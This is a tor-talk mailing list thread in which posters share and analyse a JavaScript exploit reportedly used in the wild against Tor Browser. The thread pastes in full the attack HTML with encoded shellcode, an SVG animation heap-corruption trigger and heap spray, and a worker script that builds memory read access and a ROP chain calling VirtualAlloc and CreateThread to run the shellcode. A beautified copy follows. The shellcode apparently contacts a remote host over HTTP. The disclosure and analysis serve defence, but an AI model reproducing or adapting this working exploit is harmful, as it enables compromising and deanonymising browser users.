For anyone looking into it, I tried to clean up cssbanner.js a little more.
https://gist.github.com/kristovatlas/e03be5f10e48801aec88b0e23f00a3d7 I didn't actually compare execution before and after my changes, so caveat emptor. On Tue, Nov 29, 2016 at 6:31 PM, Kevin <[email protected]> wrote: > The first var looks like an encryption key. Just my humble observation > and food for thought. > > > > > On 11/29/2016 4:55 PM, [email protected] wrote: > >> This is an Javascript exploit actively used against TorBrowser NOW. It >> consists of one HTML and one CSS file, both pasted below and also >> de-obscured. The exact functionality is unknown but it's getting access to >> "VirtualAlloc" in "kernel32.dll" and goes from there. Please fix ASAP. I >> had to break the "thecode" line in two in order to post, remove ' + ' in >> the middle to restore it. >> >> HTML: >> >> <html> >> <head> >> <script> >> >> var thecode >> ='\ue8fc\u0089\u0000\u8960\u31e5\u64d2\u528b\u8b30\u0c52\u52 >> 8b\u8b14\u2872\ub70f\u264a\uff31\uc031\u3cac\u7c61\u2c02\uc1 >> 20\u0dcf\uc701\uf0e2\u5752\u528b\u8b10\u3c42\ud001\u408b\u85 >> 78\u74c0\u014a\u50d0\u488b\u8b18\u2058\ud301\u3ce3\u8b49\u8b >> 34\ud601\uff31\uc031\uc1ac\u0dcf\uc701\ue038\uf475\u7d03\u3b >> f8\u247d\ue275\u8b58\u2458\ud301\u8b66\u4b0c\u588b\u011c\u8b >> d3\u8b04\ud001\u4489\u2424\u5b5b\u5961\u515a\ue0ff\u5f58\u8b >> 5a\ueb12\u5d86\u858d\u0297\u0000\u6850\u774c\u0726\ud5ff\uc0 >> 85\u840f\u0185\u0000\u858d\u029e\u0000\u6850\u774c\u0726\ud5 >> ff\uc085\u840f\u016f\u0000\u90bb\u0001\u2900\u54dc\u6853\u80 >> 29\u006b\ud5ff\udc01\uc085\u850f\u0155\u0000\u5050\u5050\u50 >> 40\u5040\uea68\udf0f\uffe0\u31d5\uf7db\u39d3\u0fc3\u3a84\u00 >> 01\u8900\u68c3\u2705\ue21b\u6866\u5000\uc931\uc180\u6602\u89 >> 51\u6ae2\u5210\u6853\ua599\u6174\ud5ff\uc085\u0874\u8dfe\u02 >> 48\u0000\ud775\u00b8\u0001\u2900\u89c4\u52e2\u5250\ub668\ude >> 49\uff01\u5fd5\uc481\u0100\u0000\uc085\u850f\u00f6\u0000\ue8 >> 57\u00fa\u0000\u895e\u8dca\ua7bd\u0002 >> \ue800\u00ec\u0000\u834f\u20fa\u057c\u20ba\u0000\u8900\u56d1 >> \ua4f3\u0db9\u0000\u8d00\u8ab5\u0002\uf300\u89a4\u44bd\u0002 >> \u5e00\u6856\u28a9\u8034\ud5ff\uc085\u840f' >> + >> '\u00ae\u0000\u8b66\u0a48\u8366\u04f9\u820f\u00a0\u0000\u408 >> d\u8b0c\u8b00\u8b08\ub809\u0100\u0000\u8950\u29e7\u89c4\u57e >> 6\u5156\u6851\u7248\ub8d2\ud5ff\uc085\uc481\u0104\u0000\ub70 >> f\u830f\u06f9\u7072\u06b9\u0000\ub800\u0010\u0000\uc429\ue78 >> 9\uca89\ue2d1\u5250\ud231\u168a\ud088\uf024\ue8c0\u3c04\u770 >> 9\u0404\ueb30\u0402\u8837\u4707\ud088\u0f24\u093c\u0477\u300 >> 4\u02eb\u3704\u0788\u4647\ud4e2\u2959\u89cf\u58fe\uc401\ubd8 >> b\u0244\u0000\ua4f3\u36e8\u0000\u3100\u50c0\u2951\u4fcf\u535 >> 7\uc268\u38eb\uff5f\uebd5\u6a09\u6800\u1347\u6f72\ud5ff\u685 >> 3\u6e75\u614d\ud5ff\uedeb\uc931\ud1f7\uc031\uaef2\ud1f7\uc34 >> 9\u0000\u0000\u8d03\ua7bd\u0002\ue800\uffe4\uffff\ub94f\u004 >> f\u0000\ub58d\u026e\u0000\ua4f3\ubd8d\u02a7\u0000\ucbe8\ufff >> f\uc3ff\u0a0d\u6341\u6563\u7470\u452d\u636e\u646f\u6e69\u3a6 >> 7\u6720\u697a\u0d70\u0d0a\u000a\u0a0d\u6f43\u6b6f\u6569\u203 >> a\u434d\u773d\u3273\u335f\u0032\u5049\u4c48\u4150\u4950\u470 >> 0\u5445\u2f20\u6130\u3238\u6131\u3038\u302f\u6435\u3063\u313 >> 2\u2032\u5448\u5054\u312f\u312e\u0a0d\ >> u6f48\u7473\u203a\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ >> u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ >> u0000\u0000\u4190'; >> >> >> var worker = new Worker('cssbanner.js'); >> >> worker.postMessage(thecode); >> >> var svgns = 'http://www.w3.org/2000/svg'; >> var heap80 = new Array(0x1000); >> var heap100 = new Array(0x4000); >> var block80 = new ArrayBuffer(0x80); >> var block100 = new ArrayBuffer(0x100); >> var sprayBase = undefined; >> var arrBase = undefined; >> >> var animateX = undefined; >> var containerA = undefined; >> >> var offset = 0x90; >> if >> (/.*Firefox\/(4[7-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigat >> or.userAgent)) >> { >> offset = 0x88; // versions 47.0 or greater >> } >> >> var $ = function(id) { return document.getElementById(id); } >> >> var exploit = function() >> { >> var u32 = new Uint32Array(block80) >> u32[0x2] = arrBase - offset; >> u32[0x8] = arrBase - offset; >> u32[0xE] = arrBase - offset; >> >> >> for(i = heap100.length/2; i < heap100.length; i++) >> { >> heap100[i] = block100.slice(0) >> } >> >> for(i = 0; i < heap80.length/2; i++) >> { >> heap80[i] = block80.slice(0) >> } >> >> animateX.setAttribute('begin', '59s') >> animateX.setAttribute('begin', '58s') >> >> for(i = heap80.length/2; i < heap80.length; i++) >> { >> heap80[i] = block80.slice(0) >> } >> >> for(i = heap100.length/2; i < heap100.length; i++) >> { >> heap100[i] = block100.slice(0) >> } >> >> animateX.setAttribute('begin', '10s') >> animateX.setAttribute('begin', '9s') >> window.dump('PAUSING!!! YAYA'); >> containerA.pauseAnimations(); >> } >> >> worker.onmessage = function(e) >> { >> worker.onmessage = function(e) >> { >> window.setTimeout(function() >> { >> worker.terminate(); >> >> document.body.innerHTML = ''; >> document.getElementsByTagName('head')[0].innerHTML = ''; >> document.body.setAttribute('onload', '') >> }, 1000); >> } >> >> arrBase = e.data; >> exploit(); >> } >> >> >> var idGenerator = function() >> { >> return 'id' + >> (((1+Math.random())*0x10000)|0).toString(16).substring(1); >> } >> >> >> var craftDOM = function() >> { >> containerA = document.createElementNS(svgns, 'svg') >> var containerB = document.createElementNS(svgns, 'svg'); >> >> animateX = document.createElementNS(svgns, 'animate') >> var animateA = document.createElementNS(svgns, 'animate') >> var animateB = document.createElementNS(svgns, 'animate') >> >> var animateC = document.createElementNS(svgns, 'animate') >> >> var idX = idGenerator(); >> var idA = idGenerator(); >> var idB = idGenerator(); >> var idC = idGenerator(); >> >> animateX.setAttribute('id', idX); >> animateA.setAttribute('id', idA); >> animateA.setAttribute('end', '50s'); >> animateB.setAttribute('id', idB); >> animateB.setAttribute('begin', '60s'); >> animateB.setAttribute('end', idC + '.end'); >> animateC.setAttribute('id', idC); >> animateC.setAttribute('begin', '10s'); >> animateC.setAttribute('end', idA + '.end'); >> >> containerA.appendChild(animateX) >> containerA.appendChild(animateA) >> containerA.appendChild(animateB) >> >> containerB.appendChild(animateC) >> >> document.body.appendChild(containerA); >> document.body.appendChild(containerB); >> } >> window.onload = craftDOM; >> // >> </script> >> >> <style> >> #mtdiv{ >> position: absolute; >> width: 960px; >> height: 166px; >> z-index: 15; >> top: 100px; >> left: 50%; >> margin: 0 0 0 -480px; >> } >> </style> >> </head> >> <body bgcolor='#2F3236'> >> >> <div id='mtdiv'> >> <img src='mt.png'/> >> </div> >> </body> >> <script> >> setTimeout('window.location = \'member.php\';', 2000); >> </script> >> >> </html> >> >> ============================================================ >> ======================================= >> >> content of "cssbanner.js": >> >> self.onmessage = function(msg) { >> >> thecode = msg.data; >> var pack = function (b) { var a = b >> 16; return String.fromCharCode(b >> & 65535) + String.fromCharCode(a) }; >> function >> Memory(b,a,f){this._base_addr=b;this._read=a;this._write=f;t >> his._abs_read=function(a){a>=this._base_addr?a=this._read(a- >> this._base_addr):(a=4294967295-this._base_addr+1+a,a=this._ >> read(a));return >> 0>a?4294967295+a+1:a};this._abs_write=function(a,b){a>=this. >> _base_addr?this._write(a-this._base_addr,b):(a=4294967295- >> this._base_addr+1+a,this._write(a,b))};this.readByte=function(a){return >> this.read(a)&255};this.readWord=function(a){return >> this.read(a)&65535};this.readDword=function(a){return this.read(a)}; >> this.read=function(a,b){if(a%4){var >> c=this._abs_read(a&4294967292),d=this._abs_read(a+4&42949672 >> 92),e=a%4;return >> c>>>8*e|d<<8*(4-e)}return >> this._abs_read(a)};this.readStr=function(a){for(var >> b="",c=0;;){if(32==c)return"";var >> d=this.readByte(a+c);if(0==d)break;b+=String.fromCharCode(d);c++}return >> b};this.write=function(a){}} >> function PE(b,a){this.mem=b;this.export_table=this.module_base=void >> 0;this.export_table_size=0;this.import_table=void >> 0;this.import_table_size=0;this.find_module_base=function(a) >> {for(a&=4294901760;a;){if(23117==this.mem.readWord(a))return >> this.module_base=a;a-=65536}};this._resolve_pe_structures=fu >> nction(){peFile=this.module_base+this.mem.readWord(this.modu >> le_base+60);if(17744!=this.mem.readDword(peFile))throw"Bad >> NT >> Signature";this.pe_file=peFile;this.optional_header=this.pe_ >> file+36;this.export_directory= >> this.module_base+this.mem.readDword(this.pe_file+120);this. >> export_directory_size=this.mem.readDword(this.pe_file+ >> 124);this.import_directory=this.module_base+this.mem. >> readDword(this.pe_file+128);this.import_directory_size= >> this.mem.readDword(this.pe_file+132)};this.resolve_ >> imported_function=function(a,b){void >> 0==this.import_directory&&this._resolve_pe_structures();for(var >> e=this.import_directory,c=e+this.import_directory_size;e<c;){var >> d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base >> );if(a.toUpperCase()== >> d.toUpperCase()){for(var >> c=this.mem.readDword(e)+this.module_base,e=this.mem.readDwor >> d(e+16)+this.module_base,d=this.mem.readDword(c),f=0;0!= >> d;){if(this.mem.readStr(d+this.module_base+2).toUpperCas >> e()==b.toUpperCase())return >> this.mem.readDword(e+4*f);f++;d=this.mem.readDword(c+4*f)}br >> eak}e+=20}return >> 0};void 0!=a&&this.find_module_base(a)} >> function ROP(b,a){this.mem=b;this.pe=new >> PE(b,a);this.pe._resolve_pe_structures();this.module_base=th >> is.pe.module_base+4096;this.findSequence=function(a){for(var >> b=0;;){for(var >> e=0,c=0;c<a.length;c++)if(this.mem.readByte(this.module_base >> +b+c)==a[c]&&e==c)e++;else >> break;if(e==a.length)return >> this.module_base+b;b++}};this.findStackPivot=function(){return >> this.findSequence([148,195])};this.findPopRet=function(a){return >> this.findSequence([88,195])};this.ropChain=function(a,b,e,c){c=void >> 0!=c?c:new ArrayBuffer(4096); >> c=new Uint32Array(c);var >> d=this.findStackPivot(),f=this.findPopRet("EAX"),g=this.pe. >> resolve_imported_function("kernel32.dll","VirtualAlloc");c[ >> 0]=f+1;c[1]=f;c[2]=a+b+4*e+4;c[3]=d;for(i=0;i<e;i++)c[(b>> >> 2)+i]=d;d=(b+4>>2)+e;c[d++]=g;c[d++]=a+(b+4*e+28);c[d++]=a; >> c[d++]=4096;c[d++]=4096;c[d++]=64;c[d++]=3435973836 <(343)%20597-3836> >> ;return >> c}} >> var conv=new ArrayBuffer(8),convf64=new Float64Array(conv),convu32=new >> Uint32Array(conv),qword2Double=function(b,a){convu32[0]=b; >> convu32[1]=a;return >> convf64[0]},doubleFromFloat=function(b,a){convf64[0]=b;return >> convu32[a]},sprayArrays=function(){for(var >> b=Array(262138),a=0;262138>a;a++)b[a]=fzero;for(a=0;a<b.leng >> th;a+=512)b[a+1]=memory,b[a+21]=qword2Double(0,2),b[a+14]= >> qword2Double(arrBase+o1,0),b[a+(o1+8)/8]=qword2Double(arrBa >> se+o2,0),b[a+(o2+0)/8]=qword2Double(2,0),b[a+(o2+8)/8]= >> qword2Double(arrBase+ >> o3,arrBase+13),b[a+(o3+0)/8]=qword2Double(16,0),b[a+(o3+24) >> /8]=qword2Double(2,0),b[a+(o3+32)/8]=qword2Double(arrBase+o5 >> ,arrBase+o4),b[a+(o4+0)/8]=qword2Double(0,arrBase+o6),b[a+( >> o5+0)/8]=qword2Double(arrBase+o7,0),b[a+(o6+8)/8]=qword2Doub >> le(2,0),b[a+(o7+8)/8]=qword2Double(arrBase+o7+16,0), >> b[a+(o7+16)/8]=qword2Double(0,4026531840 <(402)%20653-1840> >> ),b[a+(o7+32)/8]=qword2Double(0,3220176896),b[ >> a+(o7+48)/8]=qword2Double(2,0),b[a+(o7+56)/8]=qword2Double( >> 1,0),b[a+(o7+96)/8]=qword2Double(arrBase+o8,arrBase+o8),b[a+(o7+112)/ >> 8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+(o7+168)/8]= >> qword2Double(0,2),b[a+(o9+0)/8]=qword2Double(arrBase+o10,2), >> b[a+(o10+0)/8]=qword2Double(2,0),b[a+(o10+8)/8]=qword2Double >> (0,268435456),b[a+(o11+8)/8]=qword2Double(arrBase+o11+16,0) >> ,b[a+(o11+16)/8]=qword2Double(0,4026531840 <(402)%20653-1840> >> ),b[a+(o11+32)/8]=qword2Double(0,3220176896),b[ >> a+(o11+48)/8]=qword2Double(2,0),b[a+(o11+56)/8]= >> qword2Double(1,0),b[a+(o11+96)/8]=qword2Double(arrBase+o8, >> arrBase+o8),b[a+(o11+112)/8]=qword2Double(arrBase+o9,arrBase+o9+16),b[a+ >> (o11+168)/8]=qword2Double(0,2);for(a=0;a<spr.length;a++) >> spr[a]=b.slice(0)},vtable_offset=300;/.*Firefox\/(41\.0( >> \.[1-2]|)|42\.0).*/.test(navigator.userAgent)?vtable_ >> offset=304:/.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/. >> test(navigator.userAgent)&&(vtable_offset=308); >> var spr=Array(400),arrBase=805306416,ropArrBuf=new >> ArrayBuffer(4096),o1=176,o2=256,o3=768,o4=832,o5=864,o6=928, >> o7=1024,o8=1280,o9=1344,o10=1376,o11=1536,oRop=1792,memory=new >> Uint32Array(16),len=memory.length,arr_index=0,arr_offset=0; >> fzero=qword2Double(0,0);0!=thecode.length%2&&(thecode+="\u90 >> 90");sprayArrays();postMessage(arrBase); >> for(memarrayloc=void 0;void >> 0==memarrayloc;)for(i=0;i<spr.length;i++)for(offset=0;offset >> <spr[i].length;offset+=512)if("object"!=typeof >> spr[i][offset+1]){memarrayloc=doubleFromFloat(spr[i][offset+ >> 1],0);arr_index=i;arr_offset=offset;spr[i][offset+(o2+0)/8]= >> qword2Double(65,0);spr[i][offset+(o2+8)/8]=qword2Double(arrB >> ase+o3,memarrayloc+27);for(j=0;33>j;j++)spr[i][offset+(o2+ >> 16)/8+j]=qword2Double(memarrayloc+27,memarrayloc+27) >> ;spr[i][offset+(o3+8)/8]=qword2Double(0,0);spr[i][ >> offset+(o5+0)/8]=qword2Double(arrBase+ >> o11,0);spr[i][offset+(o7+168)/8]=qword2Double(0,3);spr[i][o >> ffset+(o7+88)/8]=qword2Double(0,2);break}for(;memory.length==len;);var >> mem=new Memory(memarrayloc+48,function(b){return >> memory[b/4]},function(b,a){memory[b/4]=a}),xulPtr=mem.readDw >> ord(memarrayloc+12);spr[arr_index][arr_offset+1]=ropArrBuf >> ;ropPtr=mem.readDword(arrBase+8);spr[arr_index][arr_offset+ >> 1]=null;ropBase=mem.readDword(ropPtr+16);var >> rop=new >> ROP(mem,xulPtr);rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); >> var backupESP=rop.findSequence([137,1,195]),ropChain=new >> Uint32Array(ropArrBuf);ropChain[0]=backupESP;CreateThread= >> rop.pe.resolve_imported_function("KERNEL32.dll","CreateThread");for(var >> i=0;i<ropChain.length&&3435973836!=ropChain[i];i++); >> ropChain[i++]=3296825488;ropChain[i++]=2048;ropChain[i+ >> +]=1347469361;ropChain[i++]=1528949584;ropChain[i++]=3092271187 >> ;ropChain[i++]=CreateThread;ropChain[i++]=3096498431;ro >> pChain[i++]=arrBase+16;ropChain[i++]=1955274891;ropChain[i++ >> ]=280697892;ropChain[i++]=704643071; >> ropChain[i++]=2425406428;ropChain[i++]=4294957800;ropChain[ >> i++]=2425393407;for(var >> j=0;j<thecode.length;j+=2)ropChain[i++]=thecode.charCodeAt( >> j)+65536*thecode.charCodeAt(j+1);spr[arr_index][arr_offset]= >> qword2Double(arrBase+16,0);spr[arr_index][arr_offset+3]= >> qword2Double(0,256);spr[arr_index][arr_offset+2]= >> qword2Double(ropBase,0);spr[arr_index][arr_offset+(o11+ >> 168)/8]=qword2Double(0,3);spr[arr_index][arr_offset+(o11+88) >> /8]=qword2Double(0,2);postMessage("GREAT >> SUCCESS"); >> >> }; >> >> >> Beautified: >> >> self.onmessage = >> function(msg) { >> >> thecode = msg.data; >> var pack = function (b) { var a = b >> 16; return String.fromCharCode(b >> & 65535) + String.fromCharCode(a) }; >> >> function Memory(b,a,f) >> { >> this._base_addr=b; >> this._read=a; >> this._write=f; >> this._abs_read = function(a) { >> a >= this._base_addr ? a = this._read( a - this._base_addr) : ( >> a = 4294967295 - this._base_addr + 1 + a, a = this._read(a) ); >> return 0>a?4294967295+a+1:a >> >> }; >> this._abs_write = function(a,b) { >> a >= this._base_addr ? this._write(a - this._base_addr, b) : ( >> a >> = 4294967295 - this._base_addr + 1 + a, this._write(a,b) ) >> }; >> this.readByte = function(a) { >> return this.read(a) & 255 >> >> }; >> this.readWord = function(a) { >> return this.read(a) & 65535 >> }; >> this.readDword = function(a){ return this.read(a) }; >> this.read = function(a,b) { >> if (a%4) { >> var c = this._abs_read( a & 4294967292), >> d = this._abs_read( a+4 & 4294967292), >> e = a%4; >> return c>>>8*e | d<<8*(4-e) >> } >> return this._abs_read(a) >> }; >> this.readStr = function(a) { >> for(var b = "", c = 0;;) { >> if (32 == c) >> return ""; >> var d = this.readByte(a+c); >> if(0 == d) >> break; >> b += String.fromCharCode(d); >> c++ >> } >> return b >> >> }; >> this.write = function(a){} >> } >> function PE(b,a) { >> this.mem = b; >> this.export_table = this.module_base = void 0; >> this.export_table_size = 0; >> this.import_table = void 0; >> this.import_table_size = 0; >> this.find_module_base = function(a) { >> for(a &= 4294901760; a; ) { >> if(23117 == this.mem.readWord(a)) >> return this.module_base=a; >> a -= 65536 >> } >> }; >> this._resolve_pe_structures = function() { >> peFile = this.module_base + this.mem.readWord(this.module_ >> base+60); >> if(17744 != this.mem.readDword(peFile)) >> throw"Bad NT Signature"; >> this.pe_file = peFile; >> this.optional_header = this.pe_file+36; >> this.export_directory = >> this.module_base+this.mem.readDword(this.pe_file+120); >> this.export_directory_size = this.mem.readDword(this.pe_fil >> e+124); >> this.import_directory=this.module_base+this.mem.readDword( >> this.pe_file+128); >> this.import_directory_size=this.mem.readDword(this.pe_file+ >> 132)}; >> this.resolve_imported_function=function(a,b){ >> void 0==this.import_directory&&this >> ._resolve_pe_structures(); >> for(var >> e=this.import_directory,c=e+this.import_directory_size;e<c;){ >> var >> d=this.mem.readStr(this.mem.readDword(e+12)+this.module_base); >> if(a.toUpperCase()==d.toUpperCase()){ >> for(var c = this.mem.readDword(e) + >> this.module_base, >> e = this.mem.readDword(e+16) + >> this.module_base, >> d = this.mem.readDword(c), >> f = 0 ; 0 !=d ;) >> { >> if(this.mem.readStr(d+this.mo >> dule_base+2).toUpperCase() >> == b.toUpperCase()) >> return this.mem.readDword(e+4*f); >> f++; >> d = this.mem.readDword(c+4*f) >> } >> break >> } >> e+=20 >> } >> return 0 >> }; >> void 0!=a && this.find_module_base(a) >> } >> function ROP(b,a){ >> this.mem = b; >> this.pe = new PE(b,a); >> this.pe._resolve_pe_structures(); >> this.module_base = this.pe.module_base+4096; >> this.findSequence = function(a) { >> for(var b=0;;) { >> for(var e=0,c=0;c<a.length;c++) >> if(this.mem.readByte(this.mod >> ule_base+b+c)==a[c]&&e==c) >> e++; >> else >> break; >> if(e==a.length) >> return this.module_base+b; >> b++ >> >> } >> >> }; >> this.findStackPivot=function() { >> return this.findSequence([148,195]) >> >> }; >> this.findPopRet=function(a) { >> return this.findSequence([88,195]) >> >> }; >> this.ropChain=function(a,b,e,c) { >> c = void 0 != c ? c : new ArrayBuffer(4096); >> c = new Uint32Array(c); >> var d = this.findStackPivot(), >> f = this.findPopRet("EAX"), >> g = >> this.pe.resolve_imported_function("kernel32.dll","VirtualAlloc"); >> c[0]= f+1; >> c[1]= f; >> c[2]= a+b+4*e+4; >> c[3]= d; >> for(i=0;i<e;i++) >> c[(b>>2)+i] = d; >> d =(b+4>>2)+e; >> c[d++]=g; >> c[d++]=a+(b+4*e+28); >> c[d++]=a; >> c[d++]=4096; >> c[d++]=4096; >> c[d++]=64; >> c[d++]=3435973836; >> return c >> } >> } >> var conv=new ArrayBuffer(8), >> convf64=new Float64Array(conv), >> convu32=new Uint32Array(conv), >> qword2Double=function(b,a) { >> convu32[0]=b; >> convu32[1]=a; >> return convf64[0] >> }, >> doubleFromFloat = function(b,a) { >> convf64[0]=b; >> return convu32[a] >> >> }, >> sprayArrays=function() { >> for(var b=Array(262138),a=0;262138>a;a++) >> b[a]=fzero; >> for(a=0;a<b.length;a+=512) >> b[a+1] = memory, >> b[a+21] = qword2Double(0,2), >> b[a+14] = qword2Double(arrBase+o1,0), >> b[a+(o1+8)/8] = qword2Double(arrBase+o2,0), >> b[a+(o2+0)/8] = qword2Double(2,0), >> b[a+(o2+8)/8] = qword2Double(arrBase+o3,arrBase+13), >> b[a+(o3+0)/8] = qword2Double(16,0), >> b[a+(o3+24)/8] = qword2Double(2,0), >> b[a+(o3+32)/8] = qword2Double(arrBase+o5,arrBase+o4), >> b[a+(o4+0)/8] = qword2Double(0,arrBase+o6), >> b[a+(o5+0)/8] = qword2Double(arrBase+o7,0), >> b[a+(o6+8)/8] = qword2Double(2,0), >> b[a+(o7+8)/8] = qword2Double(arrBase+o7+16,0), >> b[a+(o7+16)/8] = qword2Double(0,4026531840), >> b[a+(o7+32)/8] = qword2Double(0,3220176896), >> b[a+(o7+48)/8] = qword2Double(2,0), >> b[a+(o7+56)/8] = qword2Double(1,0), >> b[a+(o7+96)/8] = qword2Double(arrBase+o8,arrBase+o8), >> b[a+(o7+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16), >> b[a+(o7+168)/8] = qword2Double(0,2), >> b[a+(o9+0)/8] = qword2Double(arrBase+o10,2), >> b[a+(o10+0)/8] = qword2Double(2,0), >> b[a+(o10+8)/8] = qword2Double(0,268435456), >> b[a+(o11+8)/8] = qword2Double(arrBase+o11+16,0), >> b[a+(o11+16)/8] = qword2Double(0,4026531840), >> b[a+(o11+32)/8] = qword2Double(0,3220176896), >> b[a+(o11+48)/8] = qword2Double(2,0), >> b[a+(o11+56)/8] = qword2Double(1,0), >> b[a+(o11+96)/8] = qword2Double(arrBase+o8,arrBase+o8), >> b[a+(o11+112)/8] = qword2Double(arrBase+o9,arrBase+o9+16), >> b[a+(o11+168)/8] = qword2Double(0,2); >> for(a=0;a<spr.length;a++) >> spr[a]=b.slice(0) >> }, vtable_offset=300; >> /.*Firefox\/(41\.0(\.[1-2]|)|42\.0).*/.test(navigator.userAgent)? >> vtable_offset=304 : >> /.*Firefox\/(4[3-9]|[5-9]\d+|[1-9]\d{2,})\..*/.test(navigat >> or.userAgent) >> && (vtable_offset=308); >> var spr=Array(400), >> arrBase=805306416, >> ropArrBuf=new ArrayBuffer(4096), >> o1=176, >> o2=256, >> o3=768, >> o4=832, >> o5=864, >> o6=928, >> o7=1024, >> o8=1280, >> o9=1344, >> o10=1376, >> o11=1536, >> oRop=1792, >> memory=new Uint32Array(16), >> len=memory.length, >> arr_index=0, >> arr_offset=0; >> fzero=qword2Double(0,0); >> 0!=thecode.length%2&&(thecode+="\u9090"); >> sprayArrays(); >> postMessage(arrBase); >> for(memarrayloc=void 0;void 0==memarrayloc;) >> for(i=0;i<spr.length;i++) >> for(offset=0;offset<spr[i].length;offset+=512) >> if("object" != typeof spr[i][offset+1]) { >> memarrayloc=doubleFromFloat(spr[i][offset+1],0); >> arr_index=i; >> arr_offset=offset; >> spr[i][offset+(o2+0)/8]=qword2Double(65,0); >> spr[i][offset+(o2+8)/8]=qword2 >> Double(arrBase+o3,memarrayloc+27); >> for(j=0;33>j;j++) >> spr[i][offset+(o2+16)/8+j]=qwo >> rd2Double(memarrayloc+27,memarrayloc+27); >> spr[i][offset+(o3+8)/8]=qword2Double(0,0); >> spr[i][offset+(o5+0)/8]=qword2 >> Double(arrBase+o11,0); >> spr[i][offset+(o7+168)/8]=qword2Double(0,3); >> spr[i][offset+(o7+88)/8]=qword2Double(0,2); >> break >> } >> for(;memory.length==len;); >> var mem=new Memory(memarrayloc+48, >> function(b){return memory[b/4]}, >> function(b,a){memory[b/4]=a}), >> xulPtr=mem.readDword(memarrayloc+12); >> spr[arr_index][arr_offset+1]=ropArrBuf; >> ropPtr=mem.readDword(arrBase+8); >> spr[arr_index][arr_offset+1]=null; >> ropBase=mem.readDword(ropPtr+16); >> var rop=new ROP(mem,xulPtr); >> rop.ropChain(ropBase,vtable_offset,10,ropArrBuf); >> var backupESP=rop.findSequence([137,1,195]), ropChain=new >> Uint32Array(ropArrBuf); >> ropChain[0]=backupESP; >> CreateThread=rop.pe.resolve_imported_function("KERNEL32.dll >> ","CreateThread"); >> for(var i=0;i<ropChain.length&&3435973836!=ropChain[i];i++); >> ropChain[i++]=3296825488; >> ropChain[i++]=2048; >> ropChain[i++]=1347469361; >> ropChain[i++]=1528949584; >> ropChain[i++]=3092271187; >> ropChain[i++]=CreateThread; >> ropChain[i++]=3096498431; >> ropChain[i++]=arrBase+16; >> ropChain[i++]=1955274891; >> ropChain[i++]=280697892; >> ropChain[i++]=704643071; >> ropChain[i++]=2425406428; >> ropChain[i++]=4294957800; >> ropChain[i++]=2425393407; >> for (var j=0;j<thecode.length;j+=2) >> ropChain[i++]=thecode.charCodeAt(j)+65536*thecode.charCodeA >> t(j+1); >> spr[arr_index][arr_offset]=qword2Double(arrBase+16,0); >> spr[arr_index][arr_offset+3]=qword2Double(0,256); >> spr[arr_index][arr_offset+2]=qword2Double(ropBase,0); >> spr[arr_index][arr_offset+(o11+168)/8]=qword2Double(0,3); >> spr[arr_index][arr_offset+(o11+88)/8]=qword2Double(0,2); >> postMessage("GREAT SUCCESS"); >> }; >> >> >> >> > > > --- > This email has been checked for viruses by Avast antivirus software. > https://www.avast.com/antivirus > > > -- > tor-talk mailing list - [email protected] > To unsubscribe or change other settings go to > https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-talk > -- tor-talk mailing list - [email protected] To unsubscribe or change other settings go to https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-talk
